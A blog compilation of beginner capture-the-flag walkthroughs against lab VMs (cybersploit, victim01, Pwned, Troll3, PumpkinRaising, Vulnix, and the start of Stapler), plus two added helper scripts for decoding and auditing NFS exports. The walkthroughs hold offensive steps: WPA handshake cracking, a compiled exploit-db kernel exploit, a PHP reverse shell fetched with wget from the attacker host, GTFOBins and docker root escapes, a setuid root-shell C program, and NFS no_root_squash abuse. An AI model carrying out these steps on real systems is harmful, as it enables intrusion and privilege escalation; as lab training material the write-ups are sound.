
Let’s pwn cybersploit machine

Overview:

Target Machine IP Address: 192.168.56.40
My Machine IP Address: 192.168.56.20

Mission:

THIS IS A MACHINE FOR COMPLETE BEGINNERS, THERE ARE THREE FLAGS AVAILABLE IN THIS VM.

FROM THIS VM YOU WILL LEARN ABOUT ENCODER-DECODER & EXPLOIT-DB.

Download:

You can download the machine from here.
Information Gathering & Scanning Process:
sudo arp-scan --interface=eth0 192.168.56.1/24
nmap -sC -sV -p- 192.168.56.40 -o nmap.log
 
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
The web page reveals a username, itsskv, and the strings cybersploit / CyBeRSplOiT. I ran nikto but didn’t get any information; gobuster, however, did give me something..
gobuster dir -u 192.168.56.40 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log
http://192.168.56.40/robots.txt
   
R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9
Let’s decode the string (it is base64)…
echo "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9" | base64 -d
Flag1: cybersploit{youtube.com/c/cybersploit}
By the way, you might be wondering what is at http://192.168.56.40/hacker (it was just a gif). OK, since we got the username itsskv and the password cybersploit{youtube.com/c/cybersploit}, and the box is running SSH, how about we try that first?
ssh itsskv@192.168.56.40
ls -lah
cat flag2.txt
The flag is written in binary; I used this website to decode it: https://cryptii.com/pipes/binary-to-english
good work !
flag2: cybersploit{https:t.me/cybersploit1}
uname -a
3.13.0-32-generic
I googled “3.13.0-32-generic exploit” (searchsploit didn’t work for me; I will figure this out later) and found:
https://www.exploit-db.com/exploits/37292

 gcc 37292.c -o exploit

./exploit
flag3: cybersploit{Z3X21CW42C4 many many congratulations !}
That’s it guys! Going to have breakfast now … little hungry lol Wish you a productive day!!

Let’s take down victim01

Overview:

Pwned Machine IP Address: 192.168.56.38
My Machine IP Address: 192.168.56.20

Mission:

To gain access to root and read the flag file Flag.txt.

Download:

You can download the machine from here.
Information Gathering & Scanning Process:
sudo arp-scan --interface=eth0 192.168.56.1/24
nmap -sC -sV -p- -o nmap.log 192.168.56.38
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8080/tcp open http BusyBox httpd 1.13
8999/tcp open http WebFS httpd 1.21
9000/tcp open http PHP cli server 5.5 or later (PHP 7.2.30-1)
http://192.168.56.38:8999
This serves a capture file, WPA-01.cap. Let’s download it and open it in Wireshark:
wireshark WPA-01.cap &
I tried my best to dive into the cap file, but I was not able to get anything concrete. Based on the previous machine we did, I had a hunch that we would get a username and a password out of this. Although it shows many devices connected to the router (dlink), only dlink worked as a username. You might be wondering how I got the password? You might know if you have read this post. Yes, I ran aircrack-ng on the CAP file with the rockyou wordlist:
aircrack-ng WPA-01.cap -w /usr/share/wordlists/rockyou.txt
Yes, the password is p4ssword
ssh dlink@192.168.56.38        password: p4ssword
I made it a habit that as soon as I get a limited (user) shell, I manually check all the low hanging fruits, such as:
  • sudo -l
  • cat ~/.viminfo
  • crontab -l
  • history
  • find / -perm -u=s -type f 2>/dev/null
  • find / -perm 0777 -type f 2>/dev/null
  • find / -writable -type d 2>/dev/null
to name a few. If I don’t find anything, then I use linpeas.sh and other scripts, uploading them to the /tmp folder of that limited user account. We found something interesting:
https://gtfobins.github.io/gtfobins/nohup/
Note: kindly bookmark this site: https://gtfobins.github.io/
nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
Yeah, we got the flag..

Method 2: check for writeable directories.

find / -writable -type d 2>/dev/null

/var/www/bolt/public/files has 777 permissions.
If you have carefully read the output from nmap, you might have seen that the server is running a PHP cli server. That means we can upload a PHP reverse shell. Let’s do that..

On the Kali machine (I have downloaded and stored my shells and other tools at /opt):

python -m SimpleHTTPServer 8000

On the Victim01 machine:

cd /var/www/bolt/public/files/
wget 192.168.56.33:8000/php-reverse-shell.php
chmod +x php-reverse-shell.php

Also change the IP address and port in the shell to your choice. Mine: IP 192.168.56.33, port 1234. Then set up an nc listener on the Kali machine to receive the reverse connection from the Victim01 machine.

I tried executing the PHP shell on the victim machine to get the reverse connection and got a limited shell. However, when I viewed the PHP shell through the browser, I got a shell with root privilege. To be honest, I don’t know the primary reason behind it and I think I will need to explore more on this. However, I am gonna keep this in mind while shelling other boxes in the future. Yes, another way to get root! That’s all guys 🙂

Pwning Pwned

Overview:

Pwned Machine IP Address: 192.168.56.37
My Machine IP Address: 192.168.56.20

Mission:

To gain access to root and read the flag file Flag.txt.

Download:

You can download the machine from here.
To know the IP address of the Target Machine:
 sudo arp-scan --interface=vboxnet0 192.168.56.1/24

Scanning:

nmap -sC -sV  -p- 192.168.56.37 -o nmap.log
 Output:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
Let’s get a glimpse of the website first, because the machine is running an Apache web server. The page gives an attacker name:
Annlynn
After the attacker’s name, I didn’t get anything else. So, as usual, I like to check robots.txt (http://192.168.56.37/robots.txt). It points to some files which I won’t go through here because they were a rabbit hole. I ran the Nikto scanner and got a little information, but nothing special, as it just gave me things I had found earlier (the folder called nothing, that’s all).

Gobuster scanner:
gobuster dir -u 192.168.56.37 -w /usr/share/wordlists/directory-list-2.3-medium.txt -o gobuster.log
We got a new path, hidden_text. This experience taught me an important lesson, i.e. never depend on a single tool for everything.
http://192.168.56.37/hidden_text/
I tried every parameter and thought about automating the process, either through Burp Suite or a shell command. Perhaps, after this task is over, I will write a script to automate it for us.
http://192.168.56.37/pwned.vuln/
View source code:
ftpuser' && $pw=='B0ss_B!TcH'

Exploitation:

Well, the credentials didn’t work with the above login panel, so let us try them with FTP (we know the machine is running FTP from the Nmap scan). Yes, I was able to log into the machine using the above credentials. However, it is important to pass -a as an argument along with the dir command (dir -a), because although the command executed successfully, I was not able to see anything without it. I found two files in there. They look important, because one file is an SSH key and the other is a note containing a username. Probably we can get access by using this information: username ariana, password: the SSH private key. Remember, before using an SSH key, set its permissions to either 400 or 600 (usually I like 400 on production and 600 when I am trying something like a pwning machine).
chmod 600 id_rsa
ssh ariana@192.168.56.37 -i id_rsa
Yes, we got a shell here. Usually, as soon as I get a shell, I like to try some low hanging fruits first, like what is shown in the screenshot. So far we got this information:
User ariana may run the following commands on pwned:
    (selena) NOPASSWD: /home/messenger.sh
cat /home/messenger.sh  (make a mental note)
congratulations you Pwned ariana

Here is your user flag _______

fb8d98be1265dd88bac522e1b2182140

Try harder.need become root
To be honest, I am yet to have breakfast and thought to grab some, but because of this flag, I am gonna stick with the machine some more. I found a diary called ariana-personal.diary. It reads:

It’s Ariana personal Diary ::: Today Selena fight with me for Ajay. so i opened her hidden_text on server. now she resposible for the issue.

I didn’t get anything special, so how about we run the script we got above, /home/messenger.sh?
sudo -u selena /home/messenger.sh
I struggled a little here and needed to have a peek at other people’s walkthroughs (it is here). Yes, it is the perfect time to get an interactive shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
id 

docker images 

docker run -v /:/mnt --rm -it privesc chroot /mnt sh
I got root here; however, I was not happy because I don’t know what this command (docker run -v /:/mnt --rm -it privesc chroot /mnt sh) does. So I am gonna do a little research after breakfast… Wish you all a productive day!!

Some rabbit holes while I was digging through the account of ariana:

Other things I did: I thought to find some SUID and SGID files manually; however, since I have linpeas.sh on my Kali machine (192.168.56.33), I am going to upload the script from there to the target machine. That way, it will do everything automatically.

chmod +x linpeas.sh (on the target machine, in the /tmp folder)

While I was going through the extensive report from linpeas.sh, I could definitely conclude that the machine is running an outdated Docker container.
ps aux | grep "docker"
Figures 1 and 2: result excerpts from linpeas.sh.

Writeup for Troll3 machine

Overview:
Pumpkin Raising Machine IP Address: 192.168.56.26
My Machine IP Address: 192.168.56.1
Mission:
To gain access to root and read the flag file Flag.txt.
To know the IP address of the Target Machine:

sudo arp-scan --interface=vboxnet0 192.168.56.1/24

(Screenshot: https://tcert.net/wp-content/uploads/2020/07/Screenshot-from-2020-07-07-08-44-11.png)

Scanning the network:

nmap -sC -sV -p- 192.168.56.26 -o nmap.log
  • -sC run nmap’s default scripts
  • -sV reveal what services are running on the target machine, with their version numbers
  • -p- scan all the ports (65535)
  • -o save the output to nmap.log
When I look at the VM, I can see that there is start:here. I tried ssh with start as the username and here as the password. Since the user “start” is not a sudo user, I was not able to find out what sudo commands it could run. However, there were two folders:
  • bluepill
    • awesome_work
  • redpill
    • this_will_surely_work
Both awesome_work and this_will_surely_work are ASCII text files. bluepill has a shortened link; I am afraid it might automatically do some drive-by attack behind the scenes, so let’s do a VirusTotal scan. The VirusTotal report didn’t show any threat (nevertheless, some good crypter could bypass such a scan; let’s not discuss it here). Now, let’s unshorten the link. There are many free services available online and you can choose based on your preference. OK, it’s just a rabbit hole.

cat redpill/this_will_surely_work

Another rabbit hole :( Let’s enumerate the target machine for any binary or file that has SUID or SGID enabled.

find / -perm 0777 -type f 2>/dev/null

Since I am using Ubuntu Desktop, I need to install the openssh-server package to receive files from the target machine.
sudo apt install openssh-server -y

sudo systemctl start ssh

scp /var/log/.dist-manage/wytshadow.cap researcher@192.168.56.1:/home/researcher/vulhub/Troll3/2
Narration: I am transferring the wytshadow.cap file from the victim machine to my local machine at /home/researcher/vulhub/Troll3/2. Also transfer gold_star.txt (it looks like a password dictionary list).

We can analyze wytshadow.cap with Wireshark (GUI). However, we will try to analyze it with tcpdump (terminal).

tcpdump (pending)

By the look of it, I am going to guess wytshadow is the username and the password is in the .cap file. We can crack the password using the aircrack-ng package with the password dictionary we got from the victim machine, gold_star.txt.

aircrack-ng -w gold_star.txt wytshadow.cap

gaUoCe34t1

ssh wytshadow@192.168.56.26
password: gaUoCe34t1
./oohfun

control+c to stop the execution
I checked crontab and there was no entry. Let’s figure out whether any sudo-enabled binary is there.
password: gaUoCe34t1
Yes, we got something. Let’s check out the nginx configuration file and enumerate which port it is listening on. You might wonder why I am all of a sudden taking an interest in the config file. It’s because sudo is enabled on nginx. Therefore, I am trying to find some information which could be leveraged.

cat /etc/nginx/sites-enabled/default

You can see that there is a service, Lynx, which is going to run on port 8080 if nginx runs. Let’s verify whether there is any process listening on port 8080.

netstat -ntap

Actually, this is a redundant task, because from the nmap.log result we can already conclude that no service is running on port 8080. Anyway, let’s start the nginx service; I also need to google and learn a little bit about the Lynx service.
/usr/sbin/service nginx start
Now, Lynx is listening on port 8080. I understand the usage of Lynx now: it is more like a browser for the command line. You can read more here. For our purpose, what we can do is:
lynx http://192.168.56.26:8080
genphlux:HF9nd0cR!
ssh genphlux@192.168.56.26
password: HF9nd0cR!

ls
cat maleus

I copied the content of maleus to a file called key:
chmod 400 key
In my opinion, there might be a user named maleus and the SSH key is the above key. Shall we try that?
ssh maleus@192.168.56.26 -i key
Indeed, it worked!

ls

dont_even_bother

file dont_even_bother

We understood it is an ELF 64-bit LSB executable. Let’s execute it. (This approach is risky; unless you are a malware analyst, don’t execute anything on your host machine, only in a virtual machine.)

./dont_even_bother

It is expecting a password and I tried everything I could think of. No luck 🙁 Let me run the strings command:

strings dont_even_bother | less

We got something interesting (screenshot): xl8Fpx%6. Just a rabbit hole.

cat /etc/os-release
VERSION="18.04.2 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.2 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic 
I am a little desperate here because I was not able to find anything useful. I checked the kernel version, OS release, crontab entries, history, etc. When I tried cat .viminfo | less, guess what I got? password: B^slc8I$ (I am not sure what it is for). Shall we try sudo -i? No, that is not it. B^slc8I$ (let’s keep it with us a little while). I tried sudo -l with password B^slc8I$. Yeah! Finally… We can use an exploit to escalate privileges to the root user, because dont_even_bother runs with root privilege..

vi dont_even_bother.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

int main()
{
    setuid(geteuid());   /* adopt the effective uid (root under sudo) as the real uid */
    system("/bin/bash"); /* spawn a shell that keeps that uid */
    return 0;
}
:wq! (to get out of vim, for new users). Source code credit. To compile it:
gcc dont_even_bother.c -o dont_even_bother
Some gibberish warnings may come; don’t worry about those.. Let’s execute our code:

sudo ./dont_even_bother

Will I get a root access to PumpkinRaising Machine ?

Overview:
Pumpkin Raising Machine IP Address: 192.168.56.17
My Machine IP Address: 192.168.56.1
Mission:
Mission-Pumpkin v1.0 is a beginner level CTF series, created by keeping beginners in mind. This CTF series is for people who have basic knowledge of hacking tools and techniques but struggling to apply known tools. I believe that machines in this series will encourage beginners to learn the concepts by solving problems. PumpkinRaising is Level 2 of series of 3 machines under Mission-Pumpkin v1.0. The Level 1 ends by accessing PumpkinGarden_Key file, this level is all about identifying 4 pumpkin seeds (4 Flags - Seed ID’s) and gain access to root and capture final Flag.txt file.
Step 01:
nmap -sC -sV -p- 192.168.56.17 -oN nmap.log
Output:
Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-01 13:30 IST
Nmap scan report for 192.168.56.17

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    Apache httpd
| http-robots.txt: 23 disallowed entries (15 shown)
| /includes/ /scripts/ /js/ /secrets/ /css/ /themes/ 
| /CHANGELOG.txt /underconstruction.html /info.php /hidden/note.txt 
| /INSTALL.mysql.txt /seeds/seed.txt.gpg /js/hidden.js /comment/reply/ 
|_/filter/tips/
|_http-server-header: Apache
|_http-title: Mission-Pumpkin

Step 02: Actually, nmap is revealing enough information to go through; however, let me stick with my methodology. Since it is clearly running a web server on port 80, let’s visit the website and check its source code first. When I saw there is an images folder, I was a little excited because we got a beautiful tip in the previous box (it is here). Oops!

Step 03: You can also see that there is a base64 encoded message in the source code. I thought this might reveal a big secret like it did in my previous pumpkin box. However, it just turned out to be a little troll 🙂 As I was going through the source code, I saw a link to pumpkin.html. I took down the names of the characters in my notes; perhaps I could use them for some bruteforce purpose, because we know that the machine is running ssh on port 22 (from the nmap scan). In the source code there is another encoded string, which turned out to be base32 (I did some reading on base32 and tried it myself to ensure that this string is base32). Besides, if you scroll down to the bottom, you will see there is some hex string with it. For the time being, I saved that hex to a file called hex.txt and keep it here for some time, because we need to decode that base32 string first. I downloaded the pcap file and tried to trace it in Wireshark (figures 1 and 2), then used Follow TCP Stream (figures 3 and 4). Based on figures 3 and 4, we can conclude that we got another seed. Do you see that? If not, look closely (figures 5 and 6). To be honest, I didn’t see it at first, so what I did was: I know the SEED ID is 50609, so I ran the strings command and everything became very clear. See here:
strings spy.pcap
Hence we got the Jack-Be-Little Pumpkin seeds ID: 50609

Step 04: Don’t forget that we have an encoded hex string which needs to be decoded. Here we go:
cat hex.txt | xxd -p -r
Acorn Pumpkin Seeds ID: 96454

Step 05: Let’s check the presence of the robots.txt file. Output:
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used:    http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/robotstxt.html

User-agent: *
Crawl-delay: 10
# CSS, JS, Images

# Directories
Disallow: /includes/
Disallow: /scripts/
Disallow: /js/
Disallow: /secrets/
Disallow: /css/
Disallow: /themes/

#Images
Allow: /images/*.gif
Allow: /images/*.jpg

# Files
Disallow: /CHANGELOG.txt
Disallow: /underconstruction.html
Disallow: /info.php
Disallow: /hidden/note.txt
Disallow: /INSTALL.mysql.txt
Disallow: /seeds/seed.txt.gpg
Disallow: /js/hidden.js


# Paths (clean URLs)
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /scripts/pcap
Disallow: /node/add/
Disallow: /security/gettips/
Disallow: /search/hidden/
Disallow: /user/addme/
Disallow: /user/donotopen/
Disallow: /user/
Disallow: /user/settings/
I must admit that when I saw this exhaustive list, I was extremely excited; however, out of all of them, only those in bold were actually working (or revealing information of interest to me).

Step 04: While I was going through the folders (enshrined in robots.txt), I found this interesting information:
Robert : C@43r0VqG2=
Mark : Qn@F5zMg4T
goblin : 79675-06172-65206-17765
I thought these might be SSH credentials (as you can see from the nmap result, ssh is running). However, they didn’t work. So I made a note of them and proceeded with my enumeration.

Step 05: I found another intriguing piece of information at 192.168.56.101/seeds/seed.txt.gpg, see here. This file is encrypted with gpg; subsequently, I downloaded seed.txt.gpg and googled the syntax to decrypt a gpg file.
Syntax: 
gpg --decrypt seed.txt.gpg 
I tried the different passwords we got from the above enumeration.

Password: SEEDWATERSUNLIGHT
Probably you might think, how did this guy get the password SEEDWATERSUNLIGHT? True, what I did was: I took down almost all the words which I thought could be a password into a list and tried every one of them manually (the following screenshot is my note). By the way, I found this word here. If you view the source code, you will know that the sign is nothing but a space. Do you see the space in the source code? (Don’t look at the selected strings.) See my failed attempt, lol. Finally I got this..

Based on some googling, I found that the above pictorial representation is Morse code. So we had to decode it. You can simply google “decode morse code online tool”. There are many online tools and, out of those, I love this one the most: https://gchq.github.io/CyberChef/ It has many other features as well, and all you have to do is search for Morse code and choose the From Morse Code option. We got a SEED: BIGMAXPUMPKIN, SEEDS ID: 69507

I know a little about steganography. After learning that, I built a habit of running exiftool, strings and stegosuite to extract information out of any media file. Trust me, it is a very tedious task; however, it does pay off sometimes out of nowhere, lol. Having said that, one image really carried a text file with it. I couldn’t recall the exact box; however, once I was pwning a box where, when I selected all of the website, a certain message just showed up. Therefore, I did a Control+A, and do you see what I see in this message?? From this image and our previous knowledge of this box, we can expect that there is a gif file called jackolantern.gif under images, which resolves to http://192.168.56.17/images/jackolantern.gif. Truly there is an image by that name, and the meticulous way the author has hidden this image definitely speaks volumes. Yes, after running the stegosuite command with all the passwords, we finally found something useful. Command:
stegosuite -x jackolantern.gif -k Qn@F5zMg4T

We were able to extract a text message called decorative.txt 

cat decorative.txt 
We got another SEED ID, i.e. Lil’ Pump-Ke-Mon Pumpkin seeds ID: 86568. I want you to know that it is not only the result; I think we need to celebrate the process as well, like trying and enumerating everything that you could think of.. To attest to what I am saying, I will enclose one screenshot …:) If we read carefully those notes written on the website, we get a hint that we need to arrange the pumpkin seed IDs in order. And at that time, this screenshot helped me to order them. Sequence of the respective pumpkins and their seed IDs:
  • First, “Big Max Pumpkin”: 69507
  • Second, “Jack-be-little”: 50609
  • Third, “Acorn Pumpkin”: 96454
  • Fourth, “Little Pump-ke-Mon”: 86568
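Most of the flags on this page are recovered by decoding rather than cracking: base64 (cybersploit flag 1), binary text (flag 2, decoded above with cryptii), hex via xxd -p -r and base32 (the PumpkinRaising source), and Morse code (the BIGMAXPUMPKIN seed). The Python helper below is an added example, not code from the original post or from any of the VMs; it tries those decoders in order, from the strictest alphabet to the loosest, and keeps the first result that is printable text. The Morse sample is constructed; the base64 sample is flag 1 copied from above.

```python
"""Decode the text encodings met on this page: base64, base32, hex,
8-bit binary groups and Morse. Added example, not code from the original
post; sample inputs are constructed except where noted."""
import base64
import binascii
import re
import string

# International Morse for A-Z and 0-9 (enough for the pumpkin seed names).
MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z", "-----": "0", ".----": "1", "..---": "2",
    "...--": "3", "....-": "4", ".....": "5", "-....": "6", "--...": "7",
    "---..": "8", "----.": "9",
}
PRINTABLE = set(string.printable)


def _text(raw: bytes) -> str:
    """Bytes -> str, rejecting anything that is not printable ASCII so a
    wrong guess (e.g. base64-decoding random letters) is discarded."""
    out = raw.decode("ascii")          # UnicodeDecodeError is a ValueError
    if not out or any(c not in PRINTABLE for c in out):
        raise ValueError("not printable text")
    return out


def decode_binary(s: str) -> str:
    """'01100111 01101111' -> 'go': whitespace-separated 8-bit groups."""
    groups = s.split()
    if not groups or any(len(g) != 8 or set(g) - {"0", "1"} for g in groups):
        raise ValueError("not 8-bit binary groups")
    return _text(bytes(int(g, 2) for g in groups))


def decode_morse(s: str) -> str:
    """'-... .. --.' -> 'BIG'; letters split on spaces, words on '/' or
    three or more spaces. Unknown symbols raise KeyError."""
    if not s.strip():
        raise ValueError("empty")
    words = re.split(r"\s*/\s*|\s{3,}", s.strip())
    return " ".join("".join(MORSE[sym] for sym in w.split()) for w in words)


def decode_hex(s: str) -> str:
    """Same as `xxd -p -r`: hex digits (whitespace ignored) -> text."""
    return _text(binascii.unhexlify(re.sub(r"\s+", "", s)))


def decode_base32(s: str) -> str:
    return _text(base64.b32decode(s.strip(), casefold=True))


def decode_base64(s: str) -> str:
    return _text(base64.b64decode(s.strip(), validate=True))


# Strictest alphabet first: hex digits are also valid base64, and base32's
# A-Z2-7 is a subset of base64's alphabet, so the order decides the guess.
DECODERS = [
    ("binary", decode_binary),
    ("morse", decode_morse),
    ("hex", decode_hex),
    ("base32", decode_base32),
    ("base64", decode_base64),
]


def guess_decode(s: str):
    """Return (kind, plaintext) for the first decoder that yields printable
    text, or (None, s) when nothing matches."""
    for kind, fn in DECODERS:
        try:
            return kind, fn(s)
        except (ValueError, KeyError):   # binascii.Error subclasses ValueError
            continue
    return None, s


if __name__ == "__main__":
    # Flag 1 of cybersploit, copied from the walkthrough above.
    print(guess_decode("R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9"))
    # Constructed Morse sample spelling the BIGMAXPUMPKIN seed.
    print(guess_decode("-... .. --. -- .- -..- .--. ..- -- .--. -.- .. -."))
```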
I have tried many combinations to log in to ssh with the different users and passwords we got so far… Here is the note. (Many) failed attempts: (one example). I found that the following credential gives us a shell:
Username: jack
password: 69507506099645486568
Out of the many rudimentary things like checking cron entries, SUID files, kernel etc., I checked what the user can run with sudo..
sudo -l
My favourite goldmine site: https://gtfobins.github.io/ Run the command and we got root.. and the flag is here.. This box taught me many things and I am gonna revisit all the boxes I pwned later.. just to evaluate whether I really learned anything out of them 🙂 That’s all… Wish you all a very productive time 🙂

Vulnix walkthrough which bolstered my RHCSA knowledge

Hello everyone, I hope you all are doing well. Today, I am going to do a machine to enhance my penetration testing skills and, guess what, the machine tested my knowledge of RHCSA (RHEL8). The machine was easy, but you can’t say it is easy until you have certain knowledge of NFS shares (Network File System). I was like “finally the training I attended in Bangalore comes to use now lol”. The machine is called vulnix and you can easily get it from the vulhub website. When I nmap (scan) the box, a huge list of running services is revealed and of course, you can enumerate each and every service (one by one); that is actually the recommended way to learn, or a way to get better insight into the machine. This, I believe, is how a professional pentester should approach a machine. However, what I did was simply break the services into different categories and enumerate all the familiar services first. OK, let’s do the box. As always, my host machine IP address is 192.168.56.1.
sudo arp-scan --interface=vboxnet0 192.168.56.1/24
Target Machine IP: 192.168.56.13
nmap -sC -sV -p- 192.168.56.13 -oN nmap.log 

-sC running default nmap default script 
-sV enumerating services and version of services 
-p- It represent to check all the 65535 ports 
-oN output
I did an extra step here; however, it is not necessary for you. I just did this to show the readers that NFS versions 2 to 4 are running. Therefore, we can exploit either 2 or 3; 4 is comparatively secure. To get a peek, you can run the following command to know which folder is exported. To know a little about NFS: click here and here.
showmount -e 192.168.56.13
sudo mount -o vers=3 192.168.56.13:/home/vulnix mnt
Based on the output, we can be certain that there is a user named vulnix (/home/vulnix). Now, what we need to do is create this user with UID 2008 (matching the UID that owns the share, so our local user maps to the same identity on the export).
sudo useradd --uid 2008 vulnix

sudo usermod -aG sudo vulnix
su vulnix 

cd /mnt 

mkdir .ssh 

ssh-keygen 
     
./id_rsa     (which means I would like to have my keys saved in the current directory, /home/vulnix/mnt/.ssh, which is not the default path)
I split the pane so that you can have a view of both users (researcher and vulnix). From the nmap result, we know that the machine is running SSH. Therefore, we can try to log in to the remote machine with the SSH key which we generated previously and placed on the target machine through the NFS share. To know a little more about SSH and its configuration, click here.
cat id_rsa.pub > authorized_keys

ssh -i id_rsa vulnix@192.168.56.13
sudo -l
sudoedit /etc/exports

add 

 /root *(rw,no_root_squash)

No Root Squash (link)

There are many options for NFS and I want to keep this article short but effective so I am leaving out many of the various configuration items that you could do. However there is one option that is worth mentioning, no_root_squash. By default NFS will downgrade any files created with the root permissions to the nobody user. This is a security feature that prevents privileges from being shared unless specifically requested. If I create a file as the root user on the client on the NFS share, by default that file is owned by the nobody user.
 root@client:~# touch /shared/nfs1/file2 
 root@server:/nfs# ls -la file2
  -rw-r--r-- 1 nobody nogroup 0 Nov 18 18:06 file2
Sometimes it is important to share files that are owned as root with the proper permissions, in these cases this can be done by simply adding the no_root_squash attribute to the /etc/exports configuration.

Adding no_root_squash

Edit the /etc/exports file:
 root@server:/nfs# vi /etc/exports
Modify the /nfs line to:
 /nfs 192.168.0.195/32(rw,sync,no_root_squash)

In our case:

/root *(rw,no_root_squash)     (* represents all hosts)
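To make the no_root_squash risk concrete from the server side, here is an added Python audit script (not from the original post or the linked article) that parses exports(5) lines and flags the combination that let us mount /root as root above: a wildcard client, rw and no_root_squash together. The sample /etc/exports is constructed; the options shown for /home/vulnix are an assumption.

```python
"""Audit /etc/exports for the weakness used above: an export combining a
wildcard client, rw and no_root_squash lets any NFS client's root keep
uid 0 on the share. Added example, not code from the original post or the
linked article; the sample exports file below is constructed."""
import re
from dataclasses import dataclass, field


@dataclass
class Export:
    path: str
    clients: list = field(default_factory=list)   # list of (host, [options])


def parse_exports(text: str) -> list:
    """Parse exports(5) syntax: `path host1(opts) host2(opts) ...`.
    Comments and blank lines are skipped; a bare path is exported to '*'."""
    exports = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        exp = Export(path=parts[0])
        for spec in parts[1:]:
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", spec)
            if not m:                      # unbalanced parenthesis: skip spec
                continue
            host = m.group(1) or "*"       # "(rw)" alone means every host
            opts = [o.strip() for o in (m.group(2) or "").split(",") if o.strip()]
            exp.clients.append((host, opts))
        if not exp.clients:
            exp.clients.append(("*", []))  # defaults: ro, root_squash
        exports.append(exp)
    return exports


def audit_exports(text: str) -> list:
    """Return findings as (severity, path, host, message) tuples."""
    findings = []
    for exp in parse_exports(text):
        for host, opts in exp.clients:
            squash_off = "no_root_squash" in opts
            writable = "rw" in opts
            wildcard = host == "*" or host.startswith("*.")
            if squash_off and writable and wildcard:
                findings.append(("HIGH", exp.path, host,
                    "rw + no_root_squash exported to any host: a client's "
                    "root keeps uid 0 on the share"))
            elif squash_off:
                findings.append(("MEDIUM", exp.path, host,
                    "no_root_squash set: client root maps to server root"))
            if "insecure" in opts:
                findings.append(("LOW", exp.path, host,
                    "insecure: requests from unprivileged source ports accepted"))
            if wildcard and writable and not squash_off:
                findings.append(("LOW", exp.path, host,
                    "rw export to every host (root_squash still applies)"))
    return findings


# Constructed sample: the /root line from the walkthrough plus two others.
SAMPLE = """\
# /etc/exports  (constructed example)
/home/vulnix *(rw,root_squash)
/root *(rw,no_root_squash)
/srv/share 192.168.56.0/24(ro,sync)
"""

if __name__ == "__main__":
    for sev, path, host, msg in audit_exports(SAMPLE):
        print(f"{sev:6} {path} -> {host}: {msg}")
```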
Now, let’s reboot our VM so that those changes take effect on the Target Machine.
sudo mount -o vers=3 192.168.56.13:/root mnt
Now, we will use the previous concept: generate an SSH key and try to log in with it to get root access.
sudo -i  

cd /home/researcher/vulhub/vulnix/mnt 

cat trophy.txt
This flag looks weird though lol.. That’s it.. Later, if I get time, I will populate this post with other enumerations as well (full of rabbit holes, but good to look into).. It’s 23:58 and the perfect time to call it a day 🙂
samdup, tcert

A walkthrough for Stapler

Hello and Tashi Delek everyone. Today I am going to do my level best to take down Stapler, a vulnerable machine which is quite famous as it has many things that imitate the live systems we use in production. Besides, based on feedback shared by people who cleared the OSCP exam, this machine provides a close feeling of what we get in the OSCP exam (1.0). Therefore, I thought to give it a go.. As usual, my Kali machine IP address is 192.168.56.1 and I need to figure out the IP address of the target machine. For that we have a couple of ways, but I found the following one quite fast, so I will stick with it.
sudo arp-scan --interface=vboxnet0 192.168.56.1/24
Yes, the Target Machine IP address is 192.168.56.4. Let’s nmap the IP address and try to learn what ports are open, what services they run and which software versions; that way we could find some vulnerabilities.
nmap -sC -sV -p- 192.168.56.4 -oN nmap.log
-sC  We are going to use nmap’s default scripts
-sV  We are going to check the services and their versions
-p-  We are going to run the scan for all 65535 ports
-oN  We are going to keep/save the output as nmap.log

Since I am going to use these arguments again and again, I will not repeat the explanation of each argument, to minimize verbosity.

Output of Nmap result:
# Nmap 7.60 scan initiated Mon Apr 20 22:16:23 2020 as: nmap -sC -sV -p- -Pn -oN nmap.log 192.168.56.4
Nmap scan report for 192.168.56.4
PORT      STATE  SERVICE     VERSION
20/tcp    closed ftp-data
